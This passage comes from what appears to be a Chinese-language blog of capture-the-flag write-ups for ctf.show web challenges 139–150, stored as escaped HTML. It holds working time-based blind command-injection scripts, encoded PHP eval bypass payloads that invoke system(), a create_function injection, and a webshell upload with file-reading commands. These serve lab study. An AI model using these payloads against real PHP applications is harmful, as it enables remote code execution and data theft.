&quot;\nprint(result)<\/code><\/pre>\n<p>\u6211\u8fd9\u4e2a\u811a\u672c\u4e00\u76f4\u8dd1\u4e0d\u51fa\u6765\uff0c\u4e0d\u77e5\u9053\u95ee\u9898\u5728\u54ea\u3002\u3002\u3002\u3002<\/p>\n<p>\u522b\u7684\u5e08\u5085\u7684\u811a\u672c\u662f\u53ef\u4ee5\u6b63\u5e38\u8dd1\u51fa\u6765\u7684\uff1a<\/p>\n<pre><code class=\"language-python\">import requests\nimport time\nimport string\nstr=string.ascii_letters+string.digits+&#039;_~&#039;\nresult=&quot;&quot;\nfor i in range(1,10):#\u884c\n    key=0\n    for j in range(1,15):#\u5217\n        if key==1:\n            break\n        for n in str:\n            #awk &#039;NR=={0}&#039;\u9010\u884c\u8f93\u51fa\u83b7\u53d6\n            #cut -c {1} \u622a\u53d6\u5355\u4e2a\u5b57\u7b26\n            payload=&quot;if [ `ls \/|awk &#039;NR=={0}&#039;|cut -c {1}` == {2} ];then sleep 3;fi&quot;.format(i,j,n)\n            #print(payload)\n            url=&quot;http:\/\/e6b08256-9e66-4a27-8fdf-3bd971fd223c.challenge.ctf.show\/?c=&quot;+payload\n            try:\n                requests.get(url,timeout=(2.5,2.5))\n            except:\n                result=result+n\n                print(result)\n                break\n            if n==&#039;~&#039;:\n                key=1\n                result+=&quot; &quot;\n#\u627e\u5230flag\uff1a\/f149_15_h3r3<\/code><\/pre>\n<p>\u7136\u540e\u7a0d\u5fae\u6539\u4e00\u4e0b\u811a\u672c\u7206\u7834\u76f8\u5173\u76ee\u5f55\u5373\u53ef\uff0c\u8fd9\u91cc\u76f4\u63a5\u7167\u642c\u522b\u7684\u5e08\u5085\u811a\u672c\u4e86\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\u81ea\u5df1\u5199\u7684\u4e00\u76f4\u51fa\u9519\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-python\">#  !\/usr\/bin\/env python\n#  -*-coding:utf-8-*-\n#  Author: Chenjinxiang\n#  Description:\n\nimport requests\nimport time as t\n\nurl  = &#039;http:\/\/e6b08256-9e66-4a27-8fdf-3bd971fd223c.challenge.ctf.show\/?c=&#039;\nstrings = [&#039;{&#039;,&#039;}&#039;, &#039;.&#039;,&#039;\/&#039;,&#039;@&#039;,&#039;-&#039;,&#039;_&#039;,&#039;=&#039;,&#039;a&#039;,&#039;b&#039;,&#039;c&#039;,&#039;d&#039;,&#039;e&#039;,&#039;f&#039;,&#039;j&#039;,&#039;h&#039;,&#039;i&#039;,&#039;g&#039;,&#039;k&#039;,&#039;l&#039;,&#039;m&#039;,&#039;n&#039;,&#039;o&#039;,&#039;p&#039;,&#039;q&#039;,&#039;r&#039;,&#039;s&#039;,&#039;t&#039;,&#039;u&#039;,&#039;v&#039;,&#039;w&#039;,&#039;x&#039;,&#039;y&#039;,&#039;z&#039;,&#039;A&#039;,&#039;B&#039;,&#039;C&#039;,&#039;D&#039;,&#039;E&#039;,&#039;F&#039;,&#039;G&#039;,&#039;H&#039;,&#039;I&#039;,&#039;J&#039;,&#039;K&#039;,&#039;L&#039;,&#039;M&#039;,&#039;N&#039;,&#039;O&#039;,&#039;P&#039;,&#039;Q&#039;,&#039;R&#039;,&#039;S&#039;,&#039;T&#039;,&#039;U&#039;,&#039;V&#039;,&#039;W&#039;,&#039;X&#039;,&#039;Y&#039;,&#039;Z&#039;,&#039;0&#039;,&#039;1&#039;,&#039;2&#039;,&#039;3&#039;,&#039;4&#039;,&#039;5&#039;,&#039;6&#039;,&#039;7&#039;,&#039;8&#039;,&#039;9&#039;]\n\nresult = &#039;&#039;\n\nfor i in range(1,48):\n    for char in strings:\n        # payload = &quot;if [ ` ls \/ | awk &#039;NR==2&#039;  |cut -c{}` = &#039;{}&#039; ];then sleep 3;fi&quot;.format(i,char) #\u6539\u53d8NR\u503c\u7206\u7f51\u7ad9\u76ee\u5f55\uff08NR\u8868\u793a\u76ee\u5f55\u7684\u884c\u6570\uff09\n        payload = &quot;if [ `cat \/f149_15_h3r3 | awk &#039;NR==1&#039; |cut -c{}` = &#039;{}&#039; ];then sleep 5;fi&quot;.format(i,char)  #\u7206\u5177\u4f53\u6587\u4ef6\u7684\u5185\u5bb9\n        # data = {&#039;cmd&#039;:payload}\n        try:\n            start = int(t.time())\n            r = requests.get(url+payload)\n            # r = requests.post(url, data=data) #POST\u65b9\u6cd5\n            end = int(t.time()) - start\n            # print(i,char) #\u8f93\u51fa\u6b63\u5728\u7206\u7684\u5b57\u7b26\n            if end &gt;= 3:\n                result += char\n                print(&quot;Result: &quot;+result)\n                break\n        except Exception as e:\n            print(e)<\/code><\/pre>\n<p>\u8fd0\u884c\u5373\u53ef\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-python\">import requests\nimport time\nimport string\nstr=string.ascii_letters+string.digits\nresult=&quot;&quot;\nfor i in range(1,5):\n    key=0\n    for j in range(1,15):\n        if key==1:\n            break\n            for n in str:\n                payload=&quot;if [ `ls \/|awk &#039;NR=={0}&#039;|cut -c {1}` == {2} ];then sleep 3;fi&quot;.format(i,j,n)\n                #print(payload)\n                url=&quot;http:\/\/98e8dae5-2d9a-4346-bdb2-f1cfbe319546.challenge.ctf.show\/?c=&quot;+payload\n                try:\n                    requests.get(url,timeout=(2.5,2.5))\n                except:\n                    result=result+n\n                    print(result)\n                    break\n                if n==&#039;9&#039;:\n                    key=1\n                    result+=&quot; &quot;<\/code><\/pre>\n<pre><code class=\"language-python\">import requests\nimport time\nimport string\nstr=string.digits+string.ascii_lowercase+&quot;-&quot;\nresult=&quot;&quot;\nkey=0\nfor j in range(1,45):\n    print(j)\n    if key==1:\n        break\n        for n in str:\n            payload=&quot;if [ `cat \/f149_15_h3r3|cut -c {0}` == {1} ];then sleep3;fi&quot;.format(j,n)\n            #print(payload)\n            url=&quot;http:\/\/98e8dae5-2d9a-4346-bdb2-f1cfbe319546.challenge.ctf.show?c=&quot;+payload\n            try:\n                requests.get(url,timeout=(2.5,2.5))\n            except:\n                result=result+n\n                print(result)\n                break<\/code><\/pre>\n<h1>web140<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\nif(isset($_POST[&#039;f1&#039;]) &amp;&amp; isset($_POST[&#039;f2&#039;])){\n    $f1 = (String)$_POST[&#039;f1&#039;];\n    $f2 = (String)$_POST[&#039;f2&#039;];\n    if(preg_match(&#039;\/^[a-z0-9]+$\/&#039;, $f1)){\n        if(preg_match(&#039;\/^[a-z0-9]+$\/&#039;, $f2)){\n            $code = eval(&quot;return $f1($f2());&quot;);\n            if(intval($code) == &#039;ctfshow&#039;){\n                echo file_get_contents(&quot;flag.php&quot;);\n            }\n        }\n    }\n}<\/code><\/pre>\n<p>\u5d4c\u5957\u4f7f\u7528\u65e0\u53c2\u51fd\u6570\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-php\">POST:\nf1=system&amp;f2=system\nf1=getdate&amp;f2=getdate\nf1=getallheaders&amp;f2=getenv\nf1=getallheaders&amp;f2=end\nf1=getallheaders&amp;f2=getcwd  \nf1=getallheaders&amp;f2=scandir\nf1=getallheaders&amp;f2=dirname\nf1=getallheaders&amp;f2=readfile<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">\u8003\u5bdf\uff1a \u51fd\u6570\u7684\u5229\u7528 payload: f1=usleep&amp;f2=usleep<\/code><\/pre>\n<h2>\u5e38\u7528\u603b\u7ed3<\/h2>\n<pre><code class=\"language-text\">getcwd() \u51fd\u6570\u8fd4\u56de\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u3002\nscandir() \u51fd\u6570\u8fd4\u56de\u6307\u5b9a\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u548c\u76ee\u5f55\u7684\u6570\u7ec4\u3002\ndirname() \u51fd\u6570\u8fd4\u56de\u8def\u5f84\u4e2d\u7684\u76ee\u5f55\u90e8\u5206\u3002\nchdir() \u51fd\u6570\u6539\u53d8\u5f53\u524d\u7684\u76ee\u5f55\u3002\n\nreadfile()  \u8f93\u51fa\u4e00\u4e2a\u6587\u4ef6 \n\ncurrent()       \u8fd4\u56de\u6570\u7ec4\u4e2d\u7684\u5f53\u524d\u5355\u5143, \u9ed8\u8ba4\u53d6\u7b2c\u4e00\u4e2a\u503c\npos()           current() \u7684\u522b\u540d\nnext() \u51fd\u6570\u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u4e0b\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa\u3002\nend()       \u5c06\u5185\u90e8\u6307\u9488\u6307\u5411\u6570\u7ec4\u4e2d\u7684\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u5e76\u8f93\u51fa\u3002\narray_rand()    \u51fd\u6570\u8fd4\u56de\u6570\u7ec4\u4e2d\u7684\u968f\u673a\u952e\u540d\uff0c\u6216\u8005\u5982\u679c\u60a8\u89c4\u5b9a\u51fd\u6570\u8fd4\u56de\u4e0d\u53ea\u4e00\u4e2a\u952e\u540d\uff0c\u5219\u8fd4\u56de\u5305\u542b\u968f\u673a\u952e\u540d\u7684\u6570\u7ec4\u3002\narray_flip()    array_flip() \u51fd\u6570\u7528\u4e8e\u53cd\u8f6c\/\u4ea4\u6362\u6570\u7ec4\u4e2d\u6240\u6709\u7684\u952e\u540d\u4ee5\u53ca\u5b83\u4eec\u5173\u8054\u7684\u952e\u503c\u3002\n\nchr() \u51fd\u6570\u4ece\u6307\u5b9a\u7684 ASCII \u503c\u8fd4\u56de\u5b57\u7b26\u3002\nhex2bin \u2014 \u8f6c\u6362\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\u4e3a\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\n\ngetenv()        \u83b7\u53d6\u4e00\u4e2a\u73af\u5883\u53d8\u91cf\u7684\u503c(\u57287.1\u4e4b\u540e\u53ef\u4ee5\u4e0d\u7ed9\u4e88\u53c2\u6570)<\/code><\/pre>\n<pre><code class=\"language-text\">\u8bfb\u6587\u4ef6\uff1a\nreadfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv())))))))))))<\/code><\/pre>\n<h1>web141<\/h1>\n<pre><code class=\"language-php\">&lt;?php\n#error_reporting(0);\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;]) &amp;&amp; isset($_GET[&#039;v2&#039;]) &amp;&amp; isset($_GET[&#039;v3&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    $v2 = (String)$_GET[&#039;v2&#039;];\n    $v3 = (String)$_GET[&#039;v3&#039;];\n\n    if(is_numeric($v1) &amp;&amp; is_numeric($v2)){\n        if(preg_match(&#039;\/^\\W+$\/&#039;, $v3)){\n            $code =  eval(&quot;return $v1$v3$v2;&quot;);\n            echo &quot;$v1$v3$v2 = &quot;.$code;\n        }\n    }\n}<\/code><\/pre>\n<p>\u4ee3\u7801\u5ba1\u8ba1\u4e00\u4e0b\uff0c\u53d1\u73b0<code>v1<\/code>\u548c<code>v2<\/code>\u4e0d\u80fd\u4e3a\u6570\u5b57\uff0c<code>v3<\/code>\u53ef\u4ee5\uff0c\u4f46\u662f\u6240\u6709\u7684php\u51fd\u6570\u90fd\u9700\u8981\u5b57\u6bcd\uff0c\u8ba4\u8bc6\u5230php\u4ee3\u7801\u5982\u4e0b\u662f\u53ef\u4ee5\u6b63\u5e38\u8fd0\u884c\u7684\uff1a<\/p>\n<pre><code class=\"language-php\">phpinfo();\n# \u53ef\u4ee5\u6b63\u5e38\u8fd0\u884c\n1+phpinfo()+1;\n# \u53ef\u4ee5\u6b63\u5e38\u8fd0\u884c\n1+(&#039;phpinfo&#039;)()+1;\n# \u4ecd\u7136\u53ef\u4ee5\u6b63\u5e38\u8fd0\u884c\uff01\uff01\uff01<\/code><\/pre>\n<p>\u672c\u9898\u6b63\u5219\u5339\u914d\u662f\u8981\u6c42<code>v3<\/code>\u9700\u8981\u4ee5\u975e\u5b57\u6bcd\u6570\u5b57\u683c\u5f0f\uff1a\u5229\u752816\u8fdb\u5236\u6291\u6216\u8fdb\u884c\u7ed5\u8fc7\u3002\u3002\u3002\u3002<\/p>\n<p>\u8fd9\u4fe9payload\u90fd\u884c\uff1a<\/p>\n<pre><code class=\"language-php\">?v1=1&amp;v2=1&amp;v3=%2b(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%8b%9e%9c%df%99%d5^%ff%ff%ff%ff%ff%ff)%2b\n?v1=1&amp;v2=1&amp;v3=%2b(&quot;%13%19%13%14%05%0d&quot;|&quot;%60%60%60%60%60%60&quot;)(&quot;%14%01%03%20%06%0c%02&quot;|&quot;%60%60%60%20%60%60%28&quot;)%2b<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">\u8003\u5bdf\u547d\u4ee4\u6267\u884c\u548c\u7ed5\u8fc7return \u5e94\u8be5\u8bf4\u8fd0\u7b97\u7b26\u90fd\u53ef\u4ee5\u7ed5\u8fc7 \u8fd9\u91cc\u7528\u7fbd\u5e08\u5085\u7ed9\u7684\u4e00\u4e2a\u811a\u672c\u53d6\u53cd\u547d\u4ee4\u6267\u884c ?v1=10&amp;v2=0&amp;v3=-(%8c%86%8c%8b%9a%92)(%9c%9e%8b%df%99%d5);<\/code><\/pre>\n<h1>web142<\/h1>\n<p>\u9996\u5148\u6253\u5f00\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;html&gt;\n&lt;head&gt;&lt;title&gt;502 Bad Gateway&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;502 Bad Gateway&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;stgw\/1.3.12_1.13.5&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;<\/code><\/pre>\n<p>\u6211\u88c2\u5f00\uff0c\u91cd\u65b0\u6253\u5f00\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u6b63\u5e38\u4e86\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    if(is_numeric($v1)){\n        $d = (int)($v1 * 0x36d * 0x36d * 0x36d * 0x36d * 0x36d);\n        sleep($d);\n        echo file_get_contents(&quot;flag.php&quot;);\n    }\n}<\/code><\/pre>\n<p>\u4ee3\u7801\u5ba1\u8ba1\u4e00\u4e0b\uff0c\u5c1d\u8bd5\u5c06v1\u8bbe\u7f6e\u4e3a0\uff0c\u90a3\u4e48\u76f4\u63a5\u5c31\u4f1a\u8f93\u51faflag\uff0c\u4e0d\u4f1a\u4f11\u7720\uff01\uff01\uff01\u6210\u529f\uff01\uff01<\/p>\n<pre><code class=\"language-php\">\/?v1=0<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">0\u548c0x0\u7ed5\u8fc7 \u8fd9\u91cc\u7ed5\u8fc7\u56e0\u4e3a\u662f\u56e0\u4e3a\u5f53\u6210\u4e868\u8fdb\u5236\u548c16\u8fdb\u5236<\/code><\/pre>\n<h1>web143<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;]) &amp;&amp; isset($_GET[&#039;v2&#039;]) &amp;&amp; isset($_GET[&#039;v3&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    $v2 = (String)$_GET[&#039;v2&#039;];\n    $v3 = (String)$_GET[&#039;v3&#039;];\n    if(is_numeric($v1) &amp;&amp; is_numeric($v2)){\n        if(preg_match(&#039;\/[a-z]|[0-9]|\\+|\\-|\\.|\\_|\\||\\$|\\{|\\}|\\~|\\%|\\&amp;|\\;\/i&#039;, $v3)){\n                die(&#039;get out hacker!&#039;);\n        }\n        else{\n            $code =  eval(&quot;return $v1$v3$v2;&quot;);\n            echo &quot;$v1$v3$v2 = &quot;.$code;\n        }\n    }\n}<\/code><\/pre>\n<p>\u6309\u7167<code>web141<\/code>\u8fdb\u884c\u6539\u5c31\u53ef\u4ee5\u5f97\u5230payload\u4e86\uff0c\u52a0\u53f7\u548c\u51cf\u53f7\u4e0d\u80fd\u7528\u4e86\uff0c\u8fd9\u6b21\u7528\u4e58\u53f7\u3002\u6216<code>|<\/code>\u88ab\u8fc7\u6ee4\u4e86\uff0c\u4f7f\u7528\u5f02\u6216<code>^<\/code>\u3002<\/p>\n<pre><code class=\"language-php\">?v1=1&amp;v2=1&amp;v3=*(&quot;%0c%06%0c%0b%05%0d&quot;^&quot;%7f%7f%7f%7f%60%60&quot;)(&quot;%0b%01%03%01%06%02&quot;^&quot;%7f%60%60%21%60%28&quot;)*<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">\u4f4d\u8fd0\u7b97\u90fd\u53ef\u4ee5\u8fdb\u884c\u6784\u9020\u5b57\u7b26 ?v1=10&amp;v2=0&amp;v3=*(&quot;%0c%19%0c%5c%60%60&quot;^&quot;%7f%60%7f%28%05%0d&quot;) (&quot;%0e%0c%00%00&quot;^&quot;%60%60%20%2a&quot;)?&gt;<\/code><\/pre>\n<h1>web144<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;]) &amp;&amp; isset($_GET[&#039;v2&#039;]) &amp;&amp; isset($_GET[&#039;v3&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    $v2 = (String)$_GET[&#039;v2&#039;];\n    $v3 = (String)$_GET[&#039;v3&#039;];\n\n    if(is_numeric($v1) &amp;&amp; check($v3)){\n        if(preg_match(&#039;\/^\\W+$\/&#039;, $v2)){\n            $code =  eval(&quot;return $v1$v3$v2;&quot;);\n            echo &quot;$v1$v3$v2 = &quot;.$code;\n        }\n    }\n}\n\nfunction check($str){\n    return strlen($str)===1?true:false;\n}<\/code><\/pre>\n<p>\u7c7b\u4f3cweb141\uff0c\u6539\u4e00\u4e0b\u5c31\u80fd\u4f7f\u7528\uff1a<\/p>\n<pre><code class=\"language-php\">?v1=1&amp;v2=(&quot;%13%19%13%14%05%0d&quot;|&quot;%60%60%60%60%60%60&quot;)(&quot;%14%01%03%20%06%0c%02&quot;|&quot;%60%60%60%20%60%60%28&quot;)&amp;v3=-<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">?v1=10&amp;v2=(%8c%86%8c%8b%9a%92)(%9c%9e%8b%df%99%d5);&amp;v3=-<\/code><\/pre>\n<h1>web145<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;]) &amp;&amp; isset($_GET[&#039;v2&#039;]) &amp;&amp; isset($_GET[&#039;v3&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    $v2 = (String)$_GET[&#039;v2&#039;];\n    $v3 = (String)$_GET[&#039;v3&#039;];\n    if(is_numeric($v1) &amp;&amp; is_numeric($v2)){\n        if(preg_match(&#039;\/[a-z]|[0-9]|\\@|\\!|\\+|\\-|\\.|\\_|\\$|\\}|\\%|\\&amp;|\\;|\\&lt;|\\&gt;|\\*|\\\/|\\^|\\#|\\&quot;\/i&#039;, $v3)){\n                die(&#039;get out hacker!&#039;);\n        }\n        else{\n            $code =  eval(&quot;return $v1$v3$v2;&quot;);\n            echo &quot;$v1$v3$v2 = &quot;.$code;\n        }\n    }\n}<\/code><\/pre>\n<p>\u8fd9\u6b21\u5f02\u6216<code>^<\/code>\u53c8\u88ab\u8fc7\u6ee4\u4e86\uff0c\u53ef\u4ee5\u7528\u6216<code>|<\/code>\u548c\u53d6\u53cd<code>~<\/code>\u3002<\/p>\n<pre><code class=\"language-php\">?v1=1&amp;v3=|(&#039;%13%19%13%14%05%0d&#039;|&#039;%60%60%60%60%60%60&#039;)(&#039;%14%01%03%20%06%02&#039;|&#039;%60%60%60%20%60%28&#039;)|&amp;v2=1<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">?v1=%0a1&amp;v2=%0a0&amp;v3=?(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%d5):<\/code><\/pre>\n<h1>web146<\/h1>\n<pre><code class=\"language-php\">&lt;?php\n    highlight_file(__FILE__);\nif(isset($_GET[&#039;v1&#039;]) &amp;&amp; isset($_GET[&#039;v2&#039;]) &amp;&amp; isset($_GET[&#039;v3&#039;])){\n    $v1 = (String)$_GET[&#039;v1&#039;];\n    $v2 = (String)$_GET[&#039;v2&#039;];\n    $v3 = (String)$_GET[&#039;v3&#039;];\n    if(is_numeric($v1) &amp;&amp; is_numeric($v2)){\n        if(preg_match(&#039;\/[a-z]|[0-9]|\\@|\\!|\\:|\\+|\\-|\\.|\\_|\\$|\\}|\\%|\\&amp;|\\;|\\&lt;|\\&gt;|\\*|\\\/|\\^|\\#|\\&quot;\/i&#039;, $v3)){\n                die(&#039;get out hacker!&#039;);\n        }\n       else{\n            $code =  eval(&quot;return $v1$v3$v2;&quot;);\n            echo &quot;$v1$v3$v2 = &quot;.$code;\n        }\n    }\n}<\/code><\/pre>\n<p>\u8fd8\u7528\u4e0a\u4e00\u9898\u7684payload\u5373\u53ef\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">?v1=1&amp;v2=1&amp;v3=|(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%9e%d5)|<\/code><\/pre>\n<h1>web147<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\n\nif(isset($_POST[&#039;ctf&#039;])){\n    $ctfshow = $_POST[&#039;ctf&#039;];\n    if(!preg_match(&#039;\/^[a-z0-9_]*$\/isD&#039;,$ctfshow)) {\n        $ctfshow(&#039;&#039;,$_GET[&#039;show&#039;]);\n    }\n\n}<\/code><\/pre>\n<p>\u8fd9\u91cc\u7528\u5230\u4e86\u4e00\u4e2a\u547d\u540d\u7a7a\u95f4\u4ee5\u53ca\u533f\u540d\u51fd\u6570\u7684\u77e5\u8bc6\u70b9\uff0c\u957f\u89c1\u8bc6\u4e86\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-php\">POST:\/create_function\nGET:\/?show=;};system(&#039;grep flag flag.php&#039;);\/*<\/code><\/pre>\n<h2>Hint<\/h2>\n<p>php\u91cc\u9ed8\u8ba4\u547d\u540d\u7a7a\u95f4\u662f\\\uff0c\u6240\u6709\u539f\u751f\u51fd\u6570\u548c\u7c7b\u90fd\u5728\u8fd9\u4e2a\u547d\u540d\u7a7a\u95f4\u4e2d\u3002 \u666e\u901a\u8c03\u7528\u4e00\u4e2a\u51fd\u6570\uff0c\u5982\u679c\u76f4\u63a5\u5199\u51fd\u6570\u540dfunction_name()\u8c03\u7528\uff0c\u8c03\u7528\u7684\u65f6\u5019\u5176\u5b9e\u76f8\u5f53\u4e8e\u5199\u4e86\u4e00\u4e2a\u76f8\u5bf9\u8def \u5f84\uff1b \u800c\u5982\u679c\u5199\\function_name()\u8fd9\u6837\u8c03\u7528\u51fd\u6570\uff0c\u5219\u5176\u5b9e\u662f\u5199\u4e86\u4e00\u4e2a\u7edd\u5bf9\u8def\u5f84\u3002 \u5982\u679c\u4f60\u5728\u5176\u4ed6namespace\u91cc\u8c03\u7528\u7cfb\u7edf\u7c7b\uff0c\u5c31\u5fc5\u987b\u5199\u7edd\u5bf9\u8def\u5f84\u8fd9\u79cd\u5199 \u6cd5<\/p>\n<pre><code class=\"language-php\">payload:\nGET ?show=;};system(&#039;grep flag flag.php&#039;);\/*\nPOSOT ctf=%5ccreate_function<\/code><\/pre>\n<h1>web148<\/h1>\n<pre><code class=\"language-php\">&lt;?php\ninclude &#039;flag.php&#039;;\nif(isset($_GET[&#039;code&#039;])){\n    $code=$_GET[&#039;code&#039;];\n    if(preg_match(&quot;\/[A-Za-z0-9_\\%\\\\|\\~\\&#039;\\,\\.\\:\\@\\&amp;\\*\\+\\- ]+\/&quot;,$code)){\n        die(&quot;error&quot;);\n    }\n    @eval($code);\n}\nelse{\n    highlight_file(__FILE__);\n}\n\nfunction get_ctfshow_fl0g(){\n    echo file_get_contents(&quot;flag.php&quot;);\n}<\/code><\/pre>\n<p>\u6291\u6216\u7b26\u53f7\u6ca1\u6709\u88ab\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4f7f\u7528\u6291\u6216\u8fdb\u884c\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-php\">\/?code=(%8c%86%8c%8b%9a%92^%ff%ff%ff%ff%ff%ff)(%8b%9e%9c%df%99%d5^%ff%ff%ff%ff%ff%ff);\n(\u2018system\u2019)(\u2018tac f*\u2019)<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">#payload ?code=(&quot;%0c%19%0c%5c%60%60&quot;^&quot;%7f%60%7f%28%05%0d&quot;) (&quot;%09%01%03%01%06%02&quot;^&quot;%7d%60%60%21%60%28&quot;); \u9884\u671f\u89e3\u662f\u4f7f\u7528\u4e2d\u6587 ?code=$\u54c8=&quot;{{{&quot;^&quot;?&lt;&gt;\/&quot;;${$\u54c8}[\u54fc](${$\u54c8}[\u55ef]);&amp;\u54fc=system&amp;\u55ef=tac f* &quot;{{{&quot;^&quot;?&lt;&gt;\/&quot;; \u5f02\u6216\u51fa\u6765\u7684\u7ed3\u679c\u662f _GET<\/code><\/pre>\n<h1>web149<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\n\n$files = scandir(&#039;.\/&#039;); \nforeach($files as $file) {\n    if(is_file($file)){\n        if ($file !== &quot;index.php&quot;) {\n            unlink($file);\n        }\n    }\n}\n\nfile_put_contents($_GET[&#039;ctf&#039;], $_POST[&#039;show&#039;]);\n\n$files = scandir(&#039;.\/&#039;); \nforeach($files as $file) {\n    if(is_file($file)){\n        if ($file !== &quot;index.php&quot;) {\n            unlink($file);\n        }\n    }\n}<\/code><\/pre>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-php\">GET:\/?ctf=index.php\nPOST:show=&lt;?php eval($_POST[1]);?&gt;<\/code><\/pre>\n<p>\u4f20\u5b8c\u4e00\u53e5\u8bdd\u4ee5\u540e\u4f7f\u7528\u5bc6\u94a5\u8fdb\u884c\u83b7\u53d6flag\u5373\u53ef\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-php\">1=system(&quot;ls \/&quot;);\n1=system(&quot;ls .&quot;);\n1=system(&quot;cat \/ctfshow_fl0g_here.txt&quot;);<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">GET: ?ctf=index.php show=<\/code><\/pre>\n<h1>web150<\/h1>\n<pre><code class=\"language-php\">\u5bf9\u6211\u4eec\u4ee5\u524d\u7684\u5185\u5bb9\u8fdb\u884c\u4e86\u5c0f\u7ed3\uff0c\u6211\u4eec\u6587\u4ef6\u4e0a\u4f20\u7cfb\u5217\u518d\u89c1\uff01<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\ninclude(&quot;flag.php&quot;);\nerror_reporting(0);\nhighlight_file(__FILE__);\n\nclass CTFSHOW{\n    private $username;\n    private $password;\n    private $vip;\n    private $secret;\n\n    function __construct(){\n        $this-&gt;vip = 0;\n        $this-&gt;secret = $flag;\n    }\n\n    function __destruct(){\n        echo $this-&gt;secret;\n    }\n\n    public function isVIP(){\n        return $this-&gt;vip?TRUE:FALSE;\n        }\n    }\n\n    function __autoload($class){\n        if(isset($class)){\n            $class();\n    }\n}\n\n#\u8fc7\u6ee4\u5b57\u7b26\n$key = $_SERVER[&#039;QUERY_STRING&#039;];\nif(preg_match(&#039;\/\\_| |\\[|\\]|\\?\/&#039;, $key)){\n    die(&quot;error&quot;);\n}\n$ctf = $_POST[&#039;ctf&#039;];\nextract($_GET);\nif(class_exists($__CTFSHOW__)){\n    echo &quot;class is exists!&quot;;\n}\n\nif($isVIP &amp;&amp; strrpos($ctf, &quot;:&quot;)===FALSE){\n    include($ctf);\n}<\/code><\/pre>\n<h2>\u9996\u5148\u5199\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248628.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248628.png\" 